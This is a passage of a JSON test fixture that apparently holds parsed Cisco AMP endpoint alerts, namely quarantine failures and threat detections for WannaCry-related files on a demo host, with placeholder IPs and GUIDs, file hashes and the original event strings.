pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + 
"mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303565650558988", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843569770Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 
pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303565650558989", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843571678Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303565650558987", + 
"event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843573820Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": 
"alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303565650558986", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843575704Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419303565650558985", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", 
+ "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843595495Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + 
"mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303565650558984", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "tasksche.exe", + "pid": 2920, + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "name": "taskse.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe", + "hash": { + "sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843599818Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303574240494000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.2CA2D550E6-100.SBX.VIOC", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303574240493599", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": 
"tasksche.exe", + "pid": 2920, + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "name": "taskdl.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe", + "hash": { + "sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843601745Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303574240494000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.4A468603FD.04426d77.auto.Talos", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303574240493597", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + 
"name": "tasksche.exe", + "pid": 2920, + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "name": "u.wnry", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "hash": { + "sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "md5": "7bf2b57f2a205768755c07f238fb32cc" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843603663Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303574240494000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Ransom:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303574240493595", + "event_type_id": 1090519054 + } + }, + 
"tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "tasksche.exe", + "pid": 2920, + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "name": "@WanaDecryptor@.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", + "hash": { + "sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "md5": "7bf2b57f2a205768755c07f238fb32cc" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843605546Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\